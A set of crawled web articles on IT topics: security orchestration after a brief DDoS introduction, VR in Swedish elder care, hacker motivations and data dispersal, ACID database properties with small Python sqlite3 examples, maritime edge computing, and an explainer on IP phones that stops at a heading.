Distributed denial of service (DDoS) is an increasingly common attack that has been proven to be successful against big targets. Since the 2016 attack on Dyn, one of the largest domain-resolution companies, hackers have been motivated to use this attack on many organizations. There are ready vendors on the dark web that can rent out their botnets to be used for DDoS attacks for a given duration. One of the most feared botnets is Mirai, which is primarily composed of many IoT devices. DDoS attacks are aimed at directing a lot of illegitimate traffic to a network – more than can be handled – thus causing it to crash or be unable to handle legitimate requests. DDoS attacks are particularly of great concern to organizations that offer their products or services via websites as the attack makes it impossible for business processes to take place.
Automation has always been a big part of technology, from the earliest machines of the industrial revolution to modern robots. We have managed to greatly expand the list of devices we can automate, but these efforts are still mostly relegated to rules-based, repetitive tasks. This can be great for humans, acting as a force multiplier and leaving us those tasks that are outside the rules, requiring judgment and insight.
Cybersecurity is no stranger to the forces of automation, and it is now a central goal for many organizations as they try to respond faster to more threats with limited resources.
The next phase of automation is orchestration, stitching together automated tasks into workflows. The goal of security orchestration is not to replace the human, but to augment human skills by linking the people, processes, and technology involved to speed up detection, investigation, and response. A level of human interaction still exists, where you want the right person to see and apply judgment at the right time.
Security orchestration involves more than just security operations; it has to be aware of and even encode business processes and policies. For example, if a data loss prevention system identifies and possibly blocks an attempted data exfiltration, it may be necessary to quickly communicate with the user’s manager, human resources, or legal, not just the security department. Processes in the affected departments, their data owners, and related workloads may also need to be triggered.
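In code, the routing logic of such a workflow can be as simple as a playbook table. The event names and team lists below are invented for illustration:

```python
# Hypothetical playbook: which teams and processes each event must trigger.
PLAYBOOK = {
    "dlp_exfiltration_blocked": ["security", "line_manager", "human_resources", "legal"],
    "malware_detected": ["security", "it_operations"],
}

def orchestrate(event_type: str) -> list:
    # Unknown events fall back to notifying the security team only.
    teams = PLAYBOOK.get(event_type, ["security"])
    return ["notify:" + team for team in teams]

print(orchestrate("dlp_exfiltration_blocked"))
# ['notify:security', 'notify:line_manager', 'notify:human_resources', 'notify:legal']
```

Real orchestration platforms add queuing, escalation, and audit trails on top, but the core idea is the same: encode the business process so no required party is missed.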
Orchestration forces and encourages higher levels of communication and integration among the various components, including endpoints, data centers, clouds, and threat management. The more they can see and hear each other, the better job each one can do. Just like an orchestra cannot play with isolated musicians and instruments, security can’t effectively operate without integration.
When automating and orchestrating security, there is an initial appearance of overwhelming complexity. However, orchestration actually helps reduce complexity by identifying it in manageable chunks, forcing the development of rules and processes, and leaving the judgment-related items for humans to work on. This reduces overall load on the work force and speeds up reaction times.
In addition to these benefits, orchestration also stitches together humans. By assigning tasks to appropriate team members, it can help with skill development, training, and education. Task assignment can be broadened to include supplementary resources from other departments during periods of high demand, or assigned to junior/senior pairs during times of lower demand.
The proliferation of data and devices cannot be adequately protected from the dramatic increase in threat volume by siloed security tools and the ongoing shortage of security professionals. Automation and orchestration are the only way we are going to resolve more risks, faster, with fewer resources. | <urn:uuid:a9fada00-3292-42fb-be9a-5ab515cb68d7> | CC-MAIN-2022-40 | https://www.darkreading.com/intel/automate-and-orchestrate-workflows-for-better-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00488.warc.gz | en | 0.950776 | 551 | 2.640625 | 3 |
Elderly and handicapped people in a municipality in south Stockholm, Sweden, will soon have access to virtual reality (VR) tools as a first step in a more extensive plan to use VR to improve mental health.
The first users, in the municipality of Huddinge, are people who live in specific care units. Care workers will be able to improve communication with residents and provide virtual experiences to help with mental health issues.
Department staff have already carried out a small pilot test with three residents and will this year embark on a longer test in which about 60 residents will be offered VR, should they like to try it.
Development leader Dana Hagström is convinced the project will prove interesting for most of the residents it will be offered to.
“We will try this on two categories of residents – the elderly and residents with cognitive disabilities,” said Annika Sefbom, section manager in Huddinge’s department for social and elder care.
The pilot will involve both elderly residents in housing units designed specifically for their needs, and young people with special needs and cognitive disorders who also live in the area.
Huddinge has tried such unconventional care methods before. Some of the staff who provided daily help to residents also had technical skills and decided to use the game World of Warcraft to communicate with a resident who had an autistic behavioural disorder. It was found to be easier to communicate with that person via the tool.
Unfortunately, carers’ jobs are considered temporary and the staff who worked with this resident have since left their jobs.
Now the department’s leaders want to use VR, and see no limit to what digital tools can achieve in improving caregiving in their units and the life experience of residents there.
“We started our digitisation journey a long time ago and a few years ago, we were using World of Warcraft with some residents,” said Hagström. “It meant that they got more trustful and would let our staff come into their homes.
“Some home aid workers were also, privately, gamers and as a result had the required technical skills. When they left, no one used World of Warcraft any longer. However, we always remembered that we needed to add value, something extra, to do even better.
“Later on, we started speaking about what we could do with VR – almost jokingly, to start with. Our experience with World of Warcraft was something at least similar to build on. The idea came to us five or six years ago and the real project started about a year ago as a trial.”
At the beginning of 2019, Huddinge municipality contacted a company that could enable it to try out VR glasses. It then had to find money for the trial, which can be tricky for local authorities, not least because there are no scientific studies confirming the effectiveness of VR in helping people with cognitive problems or dementia.
The head of the department decided to make a start on the programme and at least one politician on the council took an interest and asked for more information.
Hagström said department staff and leadership looked at the VR tools and tried the technology on themselves. Another test was carried out on some of the elderly residents.
One elderly woman who took part wore VR glasses and experienced virtual farm life, something well known to her – her father had run a farm and she used to help him with it. Seeing and experiencing what it was like to be on a farm brought excitement and joy to the woman.
When considering the other group of intended VR users, handicapped citizens, the department chose to include residents with severe mental disabilities as well as mobility problems – people who are the hardest to reach.
“We have people here who are very locked in emotionally,” said Hagström. “We can’t get through to them easily, even to talk about normal daily things. We have therefore made a brave decision to try VR on them first and not on other groups to find out if we can get results.”
Sefbom added: "It also makes it easy to talk with residents. The VR experience is a fantastic new tool."
The department is now on the lookout for technically skilled staff to work on the project, which will run for three years. The team hopes that other departments will also try out VR technology. | <urn:uuid:b4b606af-7175-4b13-b7d8-6cdd0970e47c> | CC-MAIN-2022-40 | https://www.computerweekly.com/news/252478690/Swedish-council-tests-virtual-reality-in-care-for-vulnerable-people | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00488.warc.gz | en | 0.973433 | 1,001 | 2.6875 | 3 |
Have you ever wondered what are hackers like, where they are based, and what are they thinking?
They are human like everyone else – you wouldn’t be able to tell a hacker from a regular programmer. But they are often extremely smart software engineers who understand how the world of IT works, invariably a lot better than an average developer, so it’s no wonder that sometimes they end up being employed by government agencies.
Ethical hackers are helping build our defenses against data breaches and cybercrime, protect privacy, and restore trust about the digital landscape. Unfortunately, there are hackers that use their intelligence for malicious purposes and are occasionally influenced by ideologies or motivations that are not widely accepted. They leverage malware, hacking tools, and stolen identity documents from the dark web to penetrate companies’ systems.
Hackers operate across all geographies, but our systems at BOS Framework see most hacker attacks from China, Russia, Pakistan, and North Korea. This could be a strategic “counter alliance” in a bid to push for a greater bipolarity in world affairs. But with many of these geographies representing large low-income populations, hacking can appear to be a lucrative alternative.
Although some hackers are state sponsored for political reasons or work for terrorist organizations, they usually work for themselves and collect ransoms. For some hackers, breaking into forbidden places may simply seem like a fun pastime.
Fractured architecture from a hacker’s perspective
A typical company doesn't have a single application - it has many, built over many years by various people without a common architecture standard, creating a constantly changing landscape of technologies, infrastructure, and processes.
These applications are comprised of many layers: the front-end, the web or mobile application that the end-user interacts with, the APIs, the databases, and the various servers where applications and databases are hosted. The communications and data flow through this ecosystem should follow the correct principles by being transient and privilege-based, called network isolation control. For example, when users log in by entering their login credentials from the front-end, they will have specific privileges that will only allow selective access to certain data.
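A toy illustration of that privilege-based filtering, with invented roles and fields:

```python
# Hypothetical role-to-field mapping enforced at the API layer: each role
# sees only the columns its privileges allow.
ROLE_FIELDS = {
    "support_agent": {"name", "email"},
    "billing":       {"name", "invoice_total"},
}

def fetch_record(record: dict, role: str) -> dict:
    allowed = ROLE_FIELDS.get(role, set())  # unknown roles see nothing
    return {k: v for k, v in record.items() if k in allowed}

record = {"name": "Ada", "email": "ada@example.com",
          "ssn": "000-00-0000", "invoice_total": 120}
print(fetch_record(record, "billing"))  # {'name': 'Ada', 'invoice_total': 120}
```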
Developers are invariably specialists in only the front-end, API development, or databases. Their ability to perceive the entire system as one whole is challenged both by their role in the organization and by the limits of their systemic understanding.
Typically, developers identify a problem and look for the simplest and fastest solution possible (patch-by-patch formula) without having the full context. A developer’s primary focus is on user experience or the quality of the application. If the immediate customer is satisfied, not through security but by delivering functionality, the company is unconcerned.
Furthermore, developers are not always trained on security and compliance, and security officers have little input on protocol or policy. Security teams only retroactively review applications and ecosystem security when systems are already in production – by that time, it is already too late.
What should be ingrained into the company DNA has become an after-the-fact consideration. If you have an infinite number of holes on a boat, it will eventually sink – that’s why companies are becoming obvious targets for hackers.
The key takeaway here is that any system built prior to 2019 will most likely have a very different architecture and underlying standard compared to what is needed today, given the increased escalation of cyber incidents. Most systems have not been designed to follow best practices such as distributed applications and data, the separation of protected health information (PHI) and personally identifiable information (PII), and strong observability, visibility, and traceability. Now is the time.
How hackers look for weaknesses on a day-to-day basis
The disconnect between security, developer, and operation teams isn’t necessarily visually represented. But the hacker is looking at the entire ecosystem for any possible vulnerability or disconnect to exploit. If a vulnerability appears to repeat itself in various areas in the ecosystem – across the authentication, authorization, databases, servers, and logging systems – and a hacker has already exploited one area, they will be able to package up their findings as a program and deploy it at scale.
There isn’t a comprehensive way to test security weaknesses. Certain tools have security scans and penetration tests, but they are generic in nature, like end-point protection or activity logs. There are many tests for functionality which is more discoverable, but security concerns are often only revealed when there’s an actual incident. The hacker knows that this problem exists, and they are searching for new systems that have not been tested yet. Therefore, they are interested in your development, demo, beta, and production environments.
Hackers are not bound by rules nor controls. They use automation, targeted programming, and various combinations of techniques to look for weaknesses in the code, databases, and infrastructure to unlock company defenses. Their automation routines keep working as they sleep.
Segmenting and distributing data puts hackers off
Security and resilience can only result from sound architecture that is based on best practices. A successful set-up is never about a single application: it should be viewed as the connective tissue that brings together a distributed ecosystem – intentionally designed to break different types of data, like PHI, PII, and financial data into smaller units.
Companies should never have data centralized in one location. Dispersal reduces the blast radius of a data breach. The data becomes useless by itself, and hackers cannot hold any piece of this data out for ransom unless they gather all the other important information at the same time.
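A toy sketch of that dispersal. The store names and token scheme are invented; a real system would use random tokens and physically separate databases:

```python
def disperse(customer: dict, token: str) -> dict:
    # Each data category lands in its own store, linked only by an opaque
    # token -- no single store holds enough to identify and exploit a person.
    return {
        "pii_store":       {token: {"name": customer["name"], "ssn": customer["ssn"]}},
        "phi_store":       {token: {"diagnosis": customer["diagnosis"]}},
        "financial_store": {token: {"card": customer["card"]}},
    }

stores = disperse(
    {"name": "Ada", "ssn": "000-00-0000", "diagnosis": "redacted", "card": "4111-0000"},
    token="cust-7f3a",
)
print(sorted(stores))  # ['financial_store', 'phi_store', 'pii_store']
```

A breach of any single store yields fragments keyed by a meaningless token, which is exactly the reduced blast radius the text describes.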
Even as IT employment skyrockets and the IoT security testing market grows, especially SIEM and SOAR, it is unlikely that a hacker’s job will get harder. As more and more people take on employment, there will be less and less standardization, making it more exciting for hackers.
When a hacker doesn’t have to work for anyone and can be a self-employed “entrepreneur”, you can see why the job is so appealing. Hackers will always be present, like viruses, and they will always be able to enter systems. So, instead of creating defenses or resistance that are unbreachable, we must create breach resilience, redundancies, and auto-recovery capabilities. | <urn:uuid:229051ab-4d37-455a-8bbc-d91fdbe7c338> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2021/11/11/humanizing-hackers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00488.warc.gz | en | 0.945572 | 1,294 | 2.953125 | 3 |
I don’t think it’s an overstatement to say that data is pretty important. Data is especially important for modern organizations. In fact, The Economist went so far as to say that data has surpassed oil as the world’s most valuable resource, and that was back in 2017.
One of the problems with data, though, is the massive amount of it that needs to be processed on a daily basis. There's so much data being generated across the globe these days that we had to come up with a new term just to express how much data there is: big data. Sure, it's not the most impressive-sounding term out there, but the fact remains.
With all this big data out there, organizations are seeking ways to improve how they manage it all from a practical, computational, and security standpoint. As Spider-Man's Uncle Ben once said:
“With great [data] comes great responsibility.”
The best method the IT world has created for navigating the complexities of data management is through the use of databases.
What is a database?
Databases are structured sets of data that are stored within computers. Oftentimes, databases are stored on entire server farms filled with computers that were made specifically for the purpose of handling that data and the processes necessary for making use of it.
Modern databases are such complex systems that management systems have been designed to handle them. These database management systems (DBMS) seek to optimize and manage the storage and retrieval of data within databases.
One of the guiding stars leading organizations to successful database management is the ACID approach.
What is ACID?
In the context of computer science, ACID stands for:
- Atomicity
- Consistency
- Isolation
- Durability
Together, ACID is a set of guiding principles that ensure database transactions are processed reliably. A database transaction is any operation performed within a database, such as creating a new record or updating data within one.
Changes made within a database need to be performed with care to ensure the data within doesn’t become corrupted. Applying the ACID properties to each modification of a database is the best way to maintain the accuracy and reliability of a database.
Let’s look at each component of ACID.
In the context of databases, atomicity means that you either:
- Commit to the entirety of the transaction occurring
- Have no transaction at all
Essentially, an atomic transaction ensures that any commit you make finishes the entire operation successfully. Or, in cases of a lost connection in the middle of an operation, the database is rolled back to its state prior to the commit being initiated.
This is important for preventing crashes or outages from creating cases where the transaction was partially finished to an unknown overall state. If a crash occurs during a transaction with no atomicity, you can’t know exactly how far along the process was before the transaction was interrupted. By using atomicity, you ensure that either the entire transaction is successfully completed—or that none of it was.
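Python's standard-library sqlite3 module makes atomicity easy to demonstrate. The interrupted transfer below is simulated with an exception, and the partial debit is rolled back:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER)")
conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", 100), ("bob", 50)])
conn.commit()

def transfer(amount):
    with conn:  # commits on success, rolls back the whole transaction on error
        conn.execute(
            "UPDATE accounts SET balance = balance - ? WHERE name = 'alice'", (amount,)
        )
        raise RuntimeError("simulated crash before the matching credit to bob")
        conn.execute(
            "UPDATE accounts SET balance = balance + ? WHERE name = 'bob'", (amount,)
        )

try:
    transfer(70)
except RuntimeError:
    pass

print(dict(conn.execute("SELECT name, balance FROM accounts")))
# {'alice': 100, 'bob': 50} -- all or nothing
```

Because the crash happened mid-transaction, neither the debit nor the credit survives, which is exactly the guarantee atomicity provides.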
Consistency refers to maintaining data integrity constraints.
A consistent transaction will not violate integrity constraints placed on the data by the database rules. Enforcing consistency ensures that if a database enters into an illegal state (if a violation of data integrity constraints occurs) the process will be aborted and changes rolled back to their previous, legal state.
Another way of ensuring consistency within a database throughout each transaction is by also enforcing declarative constraints placed on the database.
An example of a declarative constraint might be that all customer accounts must have a positive balance. If a transaction would bring a customer account into a negative balance, that transaction would be rolled back. This ensures changes are successful at maintaining data integrity or they are canceled completely.
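Using sqlite3 from the Python standard library, a declarative constraint like that looks as follows; the illegal update is rejected and the data stays in its legal state:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Declarative constraint: customer accounts may never go negative.
conn.execute("CREATE TABLE accounts (name TEXT, balance INTEGER CHECK (balance >= 0))")
conn.execute("INSERT INTO accounts VALUES ('alice', 40)")
conn.commit()

try:
    conn.execute("UPDATE accounts SET balance = balance - 100 WHERE name = 'alice'")
except sqlite3.IntegrityError:
    conn.rollback()  # the illegal change is cancelled completely

print(conn.execute("SELECT balance FROM accounts").fetchone()[0])  # 40
```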
Isolated transactions are considered to be “serializable”, meaning each transaction happens in a distinct order without any transactions occurring in tandem.
Any reads or writes performed on the database will not be impacted by other reads and writes of separate transactions occurring on the same database. A global order is created with each transaction queueing up in line to ensure that the transactions complete in their entirety before another one begins.
Importantly, this doesn’t mean two operations can’t happen at the same time. Multiple transactions can occur as long as those transactions have no possibility of impacting the other transactions occurring at the same time.
Doing this can have impacts on the speed of transactions as it may force many operations to wait before they can initiate. However, this tradeoff is worth the added data security provided by isolation.
Isolation can be accomplished through the use of a sliding scale of permissiveness that goes between what are called optimistic transactions and pessimistic transactions:
- An optimistic transaction schema assumes that other transactions will complete without reading or writing to the same place twice. With the optimistic schema, both transactions will be aborted and retried in the case of a transaction hitting the same place twice.
- A pessimistic transaction schema provides less liberty and will lock down resources on the assumption that transactions will impact other ones. This results in fewer abort and retries, but it also means that transactions are forced to wait in line for their turn more often in comparison to the optimistic transaction approach.
Finding a sweet spot between these two ideals is often where you’ll find the best overall result.
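An optimistic scheme is commonly implemented with version counters: each transaction records the version it read, and a commit is aborted if another transaction got there first. A bare-bones Python sketch:

```python
class VersionedRow:
    """Toy row supporting optimistic concurrency control."""

    def __init__(self, value):
        self.value, self.version = value, 0

    def read(self):
        return self.value, self.version

    def write(self, new_value, expected_version):
        # Optimistic check: abort if another transaction committed first.
        if self.version != expected_version:
            raise RuntimeError("write conflict -- abort and retry")
        self.value, self.version = new_value, self.version + 1

row = VersionedRow(100)
val_a, ver_a = row.read()        # transaction A reads
val_b, ver_b = row.read()        # transaction B reads concurrently
row.write(val_a - 30, ver_a)     # A commits first
try:
    row.write(val_b + 10, ver_b) # B's version is now stale
except RuntimeError as err:
    print(err)                   # write conflict -- abort and retry
print(row.value)                 # 70
```

A pessimistic scheme would instead have transaction B block on a lock until A finished, trading waiting time for fewer aborts.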
The final aspect of the ACID approach to database management is durability.
Durability ensures that changes made to the database (transactions) that are successfully committed will survive permanently, even in the case of system failures. This ensures that the data within the database will not be corrupted by:
- Service outages
- Crashes and other system failures
Durability is achieved through the use of changelogs that are referenced when databases (or portions of the database) are restarted.
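SQLite's write-ahead log (WAL) mode is one concrete example of such a changelog: committed transactions are appended to a log file first, and a fresh connection replays or checkpoints that log as needed. A small sketch (the file and table names are arbitrary):

```python
import sqlite3, tempfile, os

dbfile = os.path.join(tempfile.mkdtemp(), "ledger.db")
conn = sqlite3.connect(dbfile)
conn.execute("PRAGMA journal_mode=WAL")  # commits are appended to ledger.db-wal first
conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, note TEXT)")
conn.execute("INSERT INTO events (note) VALUES ('order shipped')")
conn.commit()   # durable once the log write is flushed to disk
conn.close()

# A fresh connection, e.g. after a restart, sees the committed data
conn2 = sqlite3.connect(dbfile)
print(conn2.execute("SELECT note FROM events").fetchone()[0])  # order shipped
```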
ACID supports data integrity & security
When every aspect of the ACID approach is brought together successfully, databases are maintained with the utmost data integrity and data security to ensure that they continuously provide value to the organization. A database with corrupted data can present costly issues, given the huge emphasis that organizations place on their data for both day-to-day operations and strategic analysis.
Using ACID properties with your database will ensure your database continues to deliver valuable data throughout operations.
- BMC Machine Learning & Big Data Blog
Smart ships with automated systems are becoming increasingly dependent on real-time data processing. Edge computing may be the optimal solution to latency and connectivity challenges.
Keeping on pace with the rest of the industrial world, the maritime industry is continuously evolving and exploring new opportunities. Technological advances in areas such as automation, robotics, artificial intelligence, machine learning and the digital sphere in general have changed the game – and the way the industry does business.
Smarter ships, automated operations, proactive maintenance, improved security and better visibility across the supply-chain are prerequisites to meet the ever-growing demands for productivity, profitability and cost-efficiency, and many of these major advancements are direct results of the introduction of the Industrial Internet of Things (IIoT) around the turn of the millennium.
Since 2002, the IIoT has taken advantage of cloud technology to move an increasing amount of data storage and processing from centralized computer hubs and into the cloud.
The IIoT’s newest development – edge computing – takes this decentralization one step further.
Distributed processing architecture
The countless new opportunities that have emerged, are emerging and will emerge as a result of the IIoT revolution are all driven by the same essential resource: data. As such, results rely heavily on two main prerequisites: connectivity and sufficient bandwidth.
Data generation and collection are increasing exponentially – the notion that “90% of the world’s data were generated in the last two years” is already six years old – resulting in ever-increasing requirements for connectivity and bandwidth, accompanied by skyrocketing data center infrastructure and networking costs.
What edge computing essentially does is to distribute data processing amongst a series of so-called gateway PCs, or simply gateways, located closer to the edge of your network and the devices and machinery performing tasks and operations, rather than processing all data in the cloud or in a centralized computer hub.
This distributed processing architecture reduces the system’s reliance on cloud connectivity, relieves the network of bandwidth congestion, reduces latency, and may additionally lower data center costs.
Edge computing explained
In a typical edge computing set-up, a gateway is installed as close as possible, and with a direct connection, to the sensors monitoring and collecting data from a designated sub-system or piece of machinery.
These sensors often monitor tendencies and changes in vital processes and devices, collecting data as often as every millisecond. If no changes occur, continuously transmitting all that data to the cloud would be a waste of both bandwidth and processing power – an hourly update or even an end-of-the-day report might be sufficient.
An edge gateway stores, analyzes and filters the data locally, generates insights and forwards only the necessary data to the cloud.
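The filtering logic in such a gateway can be as simple as a dead-band filter: forward a reading only when it has moved meaningfully since the last value sent. A toy sketch in Python (the threshold and sample values are illustrative):

```python
def make_gateway_filter(threshold):
    """Return a function that passes a reading through only when it has
    moved more than `threshold` since the last forwarded value."""
    last_sent = None

    def should_forward(reading):
        nonlocal last_sent
        if last_sent is None or abs(reading - last_sent) > threshold:
            last_sent = reading
            return True   # worth sending upstream
        return False      # drop locally; no bandwidth spent

    return should_forward

forward = make_gateway_filter(threshold=0.5)
readings = [20.0, 20.1, 20.2, 21.0, 21.1, 25.0]   # e.g. engine temperature samples
sent = [r for r in readings if forward(r)]
print(sent)   # [20.0, 21.0, 25.0]
```

Six raw samples become three transmissions; in a real gateway the dropped readings would still feed local alarm logic.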
Solving the connectivity challenge
All industries may benefit from IIoT advances and developments, but edge computing is particularly interesting to the marine sector due to the obvious challenges with connectivity and bandwidth.
While a vessel is traversing the open seas, network connectivity and coverage may be unstable and unreliable, and bandwidth may be scarce. With more and more automated systems, machinery and devices relying on real-time data processing, not being able to transfer that data to the cloud to be processed may have a major impact on the operation in terms of productivity, efficiency and profitability.
More importantly, it may affect safety and security for personnel onboard the vessel, as heavy operating machinery depends on automated alarm triggers and kill switches to prevent potentially catastrophic incidents and accidents.
By employing edge computing, connectivity will no longer be an issue, as the locally installed gateways are able to process the data and act accordingly – whether that action is to trigger an alarm, shut a valve or hit the kill switch.
Eliminating network latency
While there are many benefits to edge computing, the most important aspect of this innovative IIoT technology is its ability to process data in real-time, nearly eliminating network latency.
With cloud processing, all data must be transmitted to the cloud, analyzed, and forwarded to a computer hub – or sent back to the device in question to trigger an action. Every “jump” the data makes introduces latency to the network. Even in a closed network, as much as two seconds of latency is not uncommon.
Latency and delayed data transfer may have a real impact on operations, as well as severe implications for onboard safety and security.
If, for instance, a crane weighing several tonnes is in the process of rotating and a sensor notices an unforeseen obstruction in its path, a braking mechanism must trigger immediately.
One second of latency may be the difference between a near miss and a catastrophe.
Edge computing moves the bulk of data processing from the cloud to the edge of your network. By doing so, edge technology offers several important benefits:
- Real-time data analysis
- Reduced latency
- Immediate automated action when required
- Reduced overall data traffic
This relieves the network of data congestion, reduces the system’s connectivity dependency, and plays a major role in ensuring the safety and security of everyone and everything onboard a vessel.
Ready to push the edge?
Hatteland Technology has extensive expertise and experience in the field of edge computing and IIoT technologies. If you are interested in exploring edge computing, our knowledgeable consultants may assist you in identifying your hardware and network needs – and help you design your optimal solution. | <urn:uuid:0d077f2a-bb3e-4c0f-b9b6-8245834f7a30> | CC-MAIN-2022-40 | https://www.hattelandtechnology.com/blog/pushing-data-processing-to-the-edge-the-benefits-of-edge-computing-in-maritime-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00488.warc.gz | en | 0.930046 | 1,104 | 2.546875 | 3 |
What is an IP Phone and Who Should Get One Right Away?
An Internet Protocol (IP) phone is a telephone that is used in conjunction with a voice over IP (VoIP) telephone system. The IP phone connects directly to the Internet and transforms voice into IP packets, which are converted back to voice when delivered to the recipient.
The technology incorporates SIP signaling and is used in combination with an IP PBX in an organization or a hosted VoIP service to communicate with customers and employees. An IP phone may also be software that is installed on the user’s computer and used to make calls from there.
You may have seen IP phones in workplaces without knowing it.
It is a kind of phone that resembles conventional office phones but uses a separate technology to power calls.
Many businesses, particularly small ones, struggle with phone calls. In your effort to update your company’s phone system, you have probably come across IP phones. What are they, and how might they improve your communications?
This article will provide an in-depth discussion of IP telephony.
What is an IP Phone
IP phones, also known as VoIP phones, can be simple software-based softphones or purpose-built hardware devices that look much like an ordinary or cordless telephone. They work by capturing the analog speech signal a person produces and converting it to a digital voice signal.
How does it work?
An IP phone passes calls through an IP phone system, also known as a VoIP system, over a network cable into the local network, and from there out onto the internet.
The SIP (Session Initiation Protocol) protocol is used by IP phone systems to connect calls made from a desk phone, mobile app, or browser to the public switched telephone network (PSTN).
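To give a sense of what SIP signaling looks like on the wire, here is a minimal INVITE request assembled by hand in Python. The addresses, branch, tag, and Call-ID values are made up for illustration; a real phone would use a full SIP stack rather than string formatting:

```python
def build_invite(caller, callee, host):
    """Assemble a bare-bones SIP INVITE; real stacks add SDP, auth, routing, etc."""
    lines = [
        f"INVITE sip:{callee}@{host} SIP/2.0",
        f"Via: SIP/2.0/UDP {host}:5060;branch=z9hG4bK776asdhds",  # illustrative branch
        f"From: <sip:{caller}@{host}>;tag=49583",
        f"To: <sip:{callee}@{host}>",
        "Call-ID: 843817637684230@198.51.100.10",  # made-up Call-ID
        "CSeq: 1 INVITE",
        "Content-Length: 0",
    ]
    # SIP, like HTTP, terminates lines with CRLF and ends headers with a blank line
    return "\r\n".join(lines) + "\r\n\r\n"

msg = build_invite("alice", "bob", "example.com")
print(msg.splitlines()[0])   # INVITE sip:bob@example.com SIP/2.0
```

The request line names the callee, the Via header tells responses how to travel back, and CSeq orders requests within the dialog; the same text-based structure carries the replies (180 Ringing, 200 OK) that set up the call.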
This new approach replaces the more familiar PBX system with call handling software, which directs incoming phone calls to the appropriate extension or device.
When wondering what a VoIP phone is, you may also be interested in learning about the other functions it offers. As a result of its inherent flexibility, VoIP may include a slew of features that would normally be associated with a conventional business phone system, like voicemail, automated answering services, call forwarding, ACD, and holding music, among other functions.
Some of the finest IP phones are powered by current smartphone operating systems like Android, which enables them to support sophisticated capabilities such as video conferencing, multi-user conversations, and contact and schedule management. These can also be used in conjunction with audio conferencing services to maximize the effectiveness of your discussions.
Cisco, Poly, Grandstream IP phones, Mitel, and many more such as Nextiva and RingCentral are just a few of the prominent names in the VoIP market. These firms have carved out a sizable portion of the IP phone industry by providing critical features such as fast dial buttons, graphical displays, and Bluetooth connectivity.
What are the benefits?
IP phone systems provide many advantages to companies of all sizes, but small and developing businesses stand to gain the most from the technology.
IP Phones Are Less Expensive
Most conventional phone lines are purchased in groups of 23, the capacity of a single PRI trunk. If your company has only a few workers, or if you are just starting out on your own, this is a non-starter for your firm.
With a virtual IP phone system, you purchase and pay for only the number of phone numbers you need. You can add more as your business grows.
You can also select a calling plan that meets your specific requirements. Have you been on the phone all day? Then you’ll want to search for a package that includes an infinite number of minutes. It may be more cost-effective to use a metered plan if you just need to make a few calls now and then.
Because everything takes place in the cloud, there are no maintenance or installation costs to worry about. When adding or deleting users, you will not need to buy, house, and maintain equipment, nor will you have to pay for technical assistance.
It makes no difference whether you make and receive calls using an IP-enabled desk phone or a mobile application; your IP phone system doesn’t care where you are. You and your workers can work from almost any location where you can connect to the Internet without the need to purchase or install extra hardware.
Are you planning to hire a new employee or two? Great! With a few clicks, you may give them an extension off of your current phone number or generate new business numbers for them on demand at no additional cost.
When you have a copper wire landline, you have to deal with regular maintenance and updates to your phone system. Not only does this result in downtime for your company, but it also means you have to wait for a specialist to arrive.
An IP phone system eliminates the need for on-site maintenance. You can conduct maintenance and updates from anywhere in the world through the internet, and with your attention freed from phone upkeep, business as usual continues.
When you select a reputable supplier, you should find it simple to get started with your new VoIP phone system. For example:
- Decide on your strategy. Your provider will work with you to design a package with a variety of calling and extra features to suit your requirements.
- Choose a phone number for yourself. A large selection of local, toll-free, and personalized numbers is available.
- Inform your service provider about your situation. Your chosen provider will only gather the information necessary to properly service your account.
- Set up a payment plan.
That’s all there is to it! If you pick the correct provider, you can begin managing your account and making calls from your mobile app as soon as you download the software.
How does IP calling work?
VoIP services are well-known for their adaptability and ease of use. However, it takes a few moments to grasp how to work with the technology. If a company does not want to completely adapt to VoIP service, a hybrid system is possible.
This alternative works well for companies that wish to retain their conventional phones. They can still use VoIP technology if they put adapters on their terminals.
Making a phone call is as simple as following the same procedure you have always used; no magic is involved. When you lift the handset (or use the speakerphone or a headset device), you will hear a dial tone.
Then you dial the number you want to contact, and the phone will begin to ring. You are free to express yourself to your heart’s content.
The call can go to a mobile phone, computer, landline phone, or another VoIP service. If it is directed to a landline, your call travels over the Internet and is switched onto the public switched telephone network (PSTN) at a point near the destination.
IP Phone Networks?
The use of IP phone networks and IP phones together allows for the transmission and reception of digital communications. IP phone systems must have three components to function properly and transmit and receive IP voice digital signals.
For an IP phone system to function, it must have an IP phone (also known as a VoIP phone) and an IP PBX (a VoIP private branch exchange). A local area network (LAN) links these components to a VoIP service provider, allowing them to communicate with one another.
The difference is that IP phone systems send telephone calls over the Internet, whereas traditional telephone systems operate via circuit-switched telephony networks.
History – What is an IP Phone?
IP phone systems were first introduced in 1995 by Alon Cohen, whose company VocalTec built the first widely used internet phone. It worked by sending voice data packets over the internet from one IP address to another.
At the time, the setup was straightforward, consisting of one internet user contacting another and using a basic microphone and speaker connected to a laptop computer. In a very short time, this system began to develop further, eventually evolving into the system it is today.
Cohen developed VoIP technology but did not make it available to the general public until the following year. Early versions only included the ability to send and receive voicemails over the Internet. This was later extended to include computer-to-telephone connections.
From 1996 to 1998, VocalTec focused on integrating Internet voicemail apps with their internet phone software and integrating their internet phone software with Microsoft NetMeeting software.
In 1998, VocalTec introduced computer-to-telephone and phone-to-phone calling capabilities as part of their VoIP service. In the beginning, user adoption of VoIP was poor – just 1 percent – in part because users had to listen to ads before, during, and after their talks, which was inconvenient.
What is a wireless IP phone?
A wireless IP phone is a small, all-in-one cordless telephone that enables people to communicate with one another from anywhere in the globe through a high-speed internet protocol (IP) connection.
PBX phone systems, audio/video conference bridges, data collaboration tools, and instant messaging servers will all be integrated smoothly into a single platform in the future of IP communications systems.
As IP network installations continue to expand, customers are seeking new services, such as the integration of video streaming capabilities, that are both cost-effective and easy to implement.
What is a landline IP phone?
